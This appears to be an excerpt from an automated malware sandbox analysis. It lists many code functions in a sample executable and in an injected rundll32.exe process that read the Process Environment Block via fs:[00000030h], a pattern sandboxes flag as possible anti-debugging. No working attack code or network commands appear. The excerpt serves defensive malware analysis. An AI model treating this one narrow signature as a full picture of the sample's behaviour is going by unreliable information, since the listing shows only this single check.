          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Code function: 4_2_0193C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Code function: 4_2_0193C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Code function: 4_2_0191C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Code function: 4_2_0192849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Code function: 4_2_01919080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Code function: 4_2_01993884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Code function: 4_2_01993884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Code function: 4_2_0194F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Code function: 4_2_0194F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Code function: 4_2_0194F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Code function: 4_2_019420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Code function: 4_2_019420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Code function: 4_2_019420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Code function: 4_2_019420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Code function: 4_2_019420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Code function: 4_2_019420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Code function: 4_2_019590AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Code function: 4_2_019E8CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Code function: 4_2_019AB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Code function: 4_2_019AB8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Code function: 4_2_019AB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Code function: 4_2_019AB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Code function: 4_2_019AB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Code function: 4_2_019AB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Code function: 4_2_019D14FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Code function: 4_2_01996CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Code function: 4_2_01996CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Code function: 4_2_01996CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Code function: 4_2_019158EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Code function: 4_2_019E4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_019E4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_01997016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_01997016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_01997016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_019E740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_019E740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_019E740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_01996C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_01996C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_01996C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_01996C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_019D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_019D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_019D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_019D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_019D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_019D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_019D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_019D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_019D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_019D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_019D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_019D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_019D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_019D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_0192B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_0192B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_0192B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_0192B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_0194BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_0194002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_0194002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_0194002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_0194002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_0194002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_01930050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_01930050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_019AC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_019AC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_0194A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_019E1074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_019D2073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_0193746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_01942397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_0194B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_01928794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_01997794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_01997794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_01997794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_019D138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_019CD380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_01921B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_01921B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_01944BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_01944BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_01944BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_019E5BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_019953CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_019953CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_019537F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_019403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_019403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_019403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_019403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_019403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_019403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_0193F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_019D131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_019AFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_019AFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_019E070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_019E070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_0194A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_0194A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_0194E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_01914F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_01914F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_019E8B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_0191F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_0191DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_0192EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_01943B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_01943B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_0191DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_0192FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_019E8F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_0194D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_0194D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_019AFE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_0192AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_0192AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_0194FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_019152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_019152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_019152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_019152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_019152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_019E0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_019E0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_019E0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_019946A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_019E8ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_01958EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_019436CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_019CFEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_01942ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_019276E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_01942AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_019416E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_0191AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_0191AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_0194A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_0194A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_01933A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_0191C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_0191C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_0191C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_01948E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_01928A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_019CFE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_0191E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_01954A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_01954A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_019A4257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_01919240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_01919240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_01919240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_01919240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_01927E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_01927E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_01927E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_01927E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_01927E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_01927E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_0193AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_0193AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_0193AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_0193AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_0193AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_0195927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_019CB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_019CB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_019E8A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_0192766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0495849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04949080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_049C3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_049C3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0497F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0497F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0497F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_049890AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_049720A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_049720A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_049720A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_049720A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_049720A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_049720A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_049DB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_049DB8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_049DB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_049DB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_049DB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_049DB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04A014FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_049C6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_049C6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_049C6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04A18CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_049458EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_049C7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_049C7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_049C7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_049C6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_049C6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_049C6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_049C6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04A01C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04A01C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04A01C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04A01C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04A01C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04A01C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04A01C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04A01C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04A01C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04A01C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04A01C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04A01C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04A01C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04A01C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04A1740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04A1740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04A1740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04A14015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04A14015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0497002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0497002D mov eax, dword ptr fs:[00000030h]
